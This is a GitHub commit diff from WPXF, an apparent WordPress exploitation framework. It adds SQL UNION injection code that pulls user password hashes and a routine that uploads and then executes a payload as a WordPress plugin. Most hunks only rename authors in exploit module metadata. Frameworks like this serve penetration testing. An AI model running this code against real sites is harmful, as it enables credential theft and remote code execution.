Skip to content
This repository has been archived by the owner on Oct 22, 2020. It is now read-only.

Commit

Permalink
Merge branch 'development'
Browse files Browse the repository at this point in the history
  • Loading branch information
rastating committed Jan 13, 2018
2 parents 50f2c83 + ce1a079 commit c496255
Show file tree
Hide file tree
Showing 238 changed files with 894 additions and 482 deletions.
2 changes: 1 addition & 1 deletion VERSION
Original file line number Diff line number Diff line change
@@ -1 +1 @@
1.8
1.8.1
23 changes: 19 additions & 4 deletions lib/wpxf/wordpress/hash_dump.rb
Original file line number Diff line number Diff line change
Expand Up @@ -29,9 +29,14 @@ def reveals_one_row_per_request
false
end

# @return [Array] an array of values to use in the generated union statement.
def hashdump_custom_union_values
[]
end

# @return [String] a unique SQL select statement that can be used to extract the hashes.
def hashdump_sql_statement
cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
cols = hashdump_union_cols
cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,user_login,0x3a,user_pass,0x3a,#{eof_token})"

query = "select #{cols.join(',')} from #{table_prefix}users"
Expand All @@ -40,9 +45,9 @@ def hashdump_sql_statement
"#{query} limit #{current_row},1"
end

# @return [String] a unique SEL select statement that can be used to fingerprint the database prefix.
# @return [String] a unique select statement that can be used to fingerprint the database prefix.
def hashdump_prefix_fingerprint_statement
cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
cols = hashdump_union_cols
cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,table_name,0x3a,#{eof_token})"

query = "select #{cols.join(',')} from information_schema.tables where table_schema = database()"
Expand Down Expand Up @@ -100,7 +105,7 @@ def run

@current_row = 0
emit_info 'Dumping user hashes...'
hashes = dump_and_parse_hashes
hashes = dump_and_parse_hashes.uniq
output_hashdump_table(hashes)

export_hashes(hashes) if export_path
Expand All @@ -109,6 +114,16 @@ def run

private

def hashdump_union_cols
cols = Array.new(hashdump_number_of_cols) { |_i| '0' }

hashdump_custom_union_values.each_with_index do |value, index|
cols[index] = value unless value.nil?
end

cols
end

def bof_token
@bof_token
end
Expand Down
31 changes: 26 additions & 5 deletions lib/wpxf/wordpress/plugin.rb
Original file line number Diff line number Diff line change
Expand Up @@ -7,9 +7,12 @@ module Wpxf::WordPress::Plugin
# @return [String, nil] the nonce, nil on error.
def wordpress_plugin_upload_nonce(cookie)
res = execute_get_request(url: wordpress_url_plugin_upload, cookie: cookie)
if res && res.code == 200

if res&.code == 200
return res.body[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
end

nil
end

# Create and upload a plugin that encapsulates the current payload.
Expand All @@ -22,11 +25,29 @@ def wordpress_upload_payload_plugin(name, payload_name, cookie)
return false if nonce.nil?

res = wordpress_upload_plugin(name, payload_name, cookie, nonce)
if res && res.code == 200
return true
else
return false
res&.code == 200
end

# Upload and execute a payload as a plugin.
# @param plugin_name [String] the name of the plugin.
# @param payload_name [String] the name the payload should use on the server.
# @param cookie [String] a valid admin session cookie.
# @return [HttpResponse, nil] the {Wpxf::Net::HttpResponse} of the request.
def wordpress_upload_and_execute_payload_plugin(plugin_name, payload_name, cookie)
unless wordpress_upload_payload_plugin(plugin_name, payload_name, cookie)
emit_error 'Failed to upload the payload'
return nil
end

payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
emit_info "Executing the payload at #{payload_url}..."
res = execute_get_request(url: payload_url)

if res&.code == 200 && !res.body.strip.empty?
emit_success "Result: #{res.body}"
end

res
end

# Generate a valid WordPress plugin header / base file.
Expand Down
5 changes: 5 additions & 0 deletions lib/wpxf/wordpress/urls.rb
Original file line number Diff line number Diff line change
Expand Up @@ -123,4 +123,9 @@ def wordpress_url_rest_api
def wordpress_url_comments_post
normalize_uri(full_uri, 'wp-comments-post.php')
end

# @return [String] the admin / plugin options URL.
def wordpress_url_admin_options
normalize_uri(wordpress_url_admin, 'admin.php')
end
end
2 changes: 1 addition & 1 deletion modules/auxiliary/ad_widget_php_file_download.rb
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@ def initialize
update_info(
name: 'Ad-Widget <= 2.11.0 Authenticated PHP File Download',
author: [
'Rob Carr <rob[at]rastating.com>' # WPXF module
'rastating' # WPXF module
],
references: [
['WPVDB', '8789']
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/all_in_one_migration_export.rb
Original file line number Diff line number Diff line change
Expand Up @@ -14,8 +14,8 @@ def initialize
All-in-One Migration plugin in versions < 2.0.5.
),
author: [
'James Golovich', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'James Golovich', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '7857'],
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/antioch_arbitrary_file_download.rb
Original file line number Diff line number Diff line change
Expand Up @@ -9,8 +9,8 @@ def initialize
update_info(
name: 'Antioch Theme Arbitrary File Download',
author: [
'Ashiyane Digital Security Team', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Ashiyane Digital Security Team', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8406']
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -9,8 +9,8 @@ def initialize
update_info(
name: 'Candidate Application Form Arbitrary File Download',
author: [
'Larry W. Cashdollar', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Larry W. Cashdollar', # Disclosure
'rastating' # WPXF module
],
references: [
['EDB', '37754']
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/cp_image_store_arbitrary_file_download.rb
Original file line number Diff line number Diff line change
Expand Up @@ -14,8 +14,8 @@ def initialize
file accessible by the user the web server is running as.
),
author: [
'Joaquin Ramirez Martinez', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Joaquin Ramirez Martinez', # Disclosure
'rastating' # WPXF module
],
references: [
['EDB', '37559']
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -13,8 +13,8 @@ def initialize
'5.1.0.3, allows unauthenticated users to create new admin users '\
'due to lack of validation when uploading SQL files.',
author: [
'Marc-Alexandre Montpas', # Vulnerability discovery
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Marc-Alexandre Montpas', # Vulnerability discovery
'rastating' # WPXF module
],
references: [
['URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html'],
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -9,8 +9,8 @@ def initialize
update_info(
name: 'Direct Download for WooCommerce <= 1.15 File Download',
author: [
'Diego Celdran Morell', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Diego Celdran Morell', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8724']
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -12,8 +12,8 @@ def initialize
'allows authenticated users to escalate their user role to '\
'that of an administrator.',
author: [
'James Golovich', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'James Golovich', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8365'],
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -16,8 +16,8 @@ def initialize
'versions < 2.8.3 of the Download Manager plugin to get '\
'the directory listing of the specified directory.',
author: [
'James Golovich', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'James Golovich', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8365'],
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/download_manager_privilege_escalation.rb
Original file line number Diff line number Diff line change
Expand Up @@ -15,8 +15,8 @@ def initialize
'allows unauthenticated users to create new admin users '\
'due to lack of validation wpdm_ajax_call_exec.',
author: [
'Mickael Nadeau', # Vulnerability discovery
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Mickael Nadeau', # Vulnerability discovery
'rastating' # WPXF module
],
references: [
['EDB', '35533'],
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/download_monitor_log_export.rb
Original file line number Diff line number Diff line change
Expand Up @@ -15,8 +15,8 @@ def initialize
includes: Download ID, Version ID, Filename, User ID, User Login, User Email, User IP, User Agent, Date, Status
),
author: [
'James Golovich', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'James Golovich', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8810']
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/duplicator_csrf_db_export.rb
Original file line number Diff line number Diff line change
Expand Up @@ -15,8 +15,8 @@ def initialize
visits the generated web page.
),
author: [
'RatioSec Research', # Discovery and disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'RatioSec Research', # Discovery and disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8388'],
Expand Down
2 changes: 1 addition & 1 deletion modules/auxiliary/easy_cart_privilege_escalation.rb
Original file line number Diff line number Diff line change
Expand Up @@ -22,7 +22,7 @@ def initialize
'a new account with admin privileges via the default registration '\
'page found at /wp-login.php?action=register.',
author: [
'Rob Carr <rob[at]rastating.com>' # Discovery and WPXF module
'rastating' # Discovery and WPXF module
],
references: [
['CVE', '2015-2673'],
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/email_users_csrf_bulk_mail.rb
Original file line number Diff line number Diff line change
Expand Up @@ -12,8 +12,8 @@ def initialize
'the Email Users plugin, which allows for the sending of a bulk e-mail to '\
'all users of a specified role.',
author: [
'Julien Rentrop', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Julien Rentrop', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8601'],
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/events_hash_dump.rb
Original file line number Diff line number Diff line change
Expand Up @@ -15,8 +15,8 @@ def initialize
to dump the hashed passwords of all users in the database.
),
author: [
'Lenon Leite', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Lenon Leite', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8954'],
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/gallery_album_hash_dump.rb
Original file line number Diff line number Diff line change
Expand Up @@ -15,8 +15,8 @@ def initialize
to dump the hashed passwords of all users in the database.
),
author: [
'Manuel Garcia Cardenas', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Manuel Garcia Cardenas', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8907'],
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/ghost_unrestricted_export_download.rb
Original file line number Diff line number Diff line change
Expand Up @@ -12,8 +12,8 @@ def initialize
'<= 0.5.5 of the Ghost plugin to download an export of the WordPress '\
'data, including usernames and e-mail addresses.',
author: [
'Josh Brody', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Josh Brody', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8479']
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -14,8 +14,8 @@ def initialize
file accessible by the user the web server is running as.
),
author: [
'Kuroi\'SH', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Kuroi\'SH', # Disclosure
'rastating' # WPXF module
],
references: [
['EDB', '37254']
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -9,8 +9,8 @@ def initialize
update_info(
name: 'IMDb Profile Widget <= 1.0.8 Arbitrary File Download',
author: [
'CrashBandicot @DosPerl', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'CrashBandicot @DosPerl', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8426'],
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/jtrt_responsive_tables_hash_dump.rb
Original file line number Diff line number Diff line change
Expand Up @@ -16,8 +16,8 @@ def initialize
of all users in the database.
),
author: [
'Lenon Leite', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Lenon Leite', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8953'],
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/long_password_dos.rb
Original file line number Diff line number Diff line change
Expand Up @@ -16,9 +16,9 @@ def initialize
'of service via a long password that is improperly handled during '\
'hashing.',
author: [
'Javier Nieto Arevalo', # Vulnerability disclosure
'Javier Nieto Arevalo', # Vulnerability disclosure
'Andres Rojas Guerrero', # Vulnerability disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'rastating' # WPXF module
],
references: [
['CVE', '2014-9034'],
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -9,8 +9,8 @@ def initialize
update_info(
name: 'Mail Masta Unauthenticated Local File Inclusion',
author: [
'Guillermo Garcia Marcos', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Guillermo Garcia Marcos', # Disclosure
'rastating' # WPXF module
],
desc: 'This module exploits a vulnerability which allows you to include any arbitrary file '\
'accessible by the user the web server is running as into the executing script.',
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -14,8 +14,8 @@ def initialize
in order to bypass mitigation within the plugin.
),
author: [
'Larry W. Cashdollar', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Larry W. Cashdollar', # Disclosure
'rastating' # WPXF module
],
references: [
['CVE', '2017-1002008'],
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -9,8 +9,8 @@ def initialize
update_info(
name: 'Memphis Documents Library <= 3.1.5 Arbitrary File Download',
author: [
'Felipe Molina', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Felipe Molina', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8419']
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/platform_privilege_escalation.rb
Original file line number Diff line number Diff line change
Expand Up @@ -21,8 +21,8 @@ def initialize
'privileges via the default registration page found at '\
'/wp-login.php?action=register.',
author: [
'Marc-Alexandre Montpas', # Vulnerability discovery
'Rob Carr <rob[at]rastating.com>' # WPXF module
'Marc-Alexandre Montpas', # Vulnerability discovery
'rastating' # WPXF module
],
references: [
['URL', 'http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html'],
Expand Down
4 changes: 2 additions & 2 deletions modules/auxiliary/post_grid_file_deletion.rb
Original file line number Diff line number Diff line change
Expand Up @@ -12,8 +12,8 @@ def initialize
'the Post Grid plugin which allows you to delete any arbitrary '\
'file accessible by the user the web server is running as.',
author: [
'White Fir Design', # Disclosure
'Rob Carr <rob[at]rastating.com>' # WPXF module
'White Fir Design', # Disclosure
'rastating' # WPXF module
],
references: [
['WPVDB', '8667'],
Expand Down
Loading

0 comments on commit c496255

Please sign in to comment.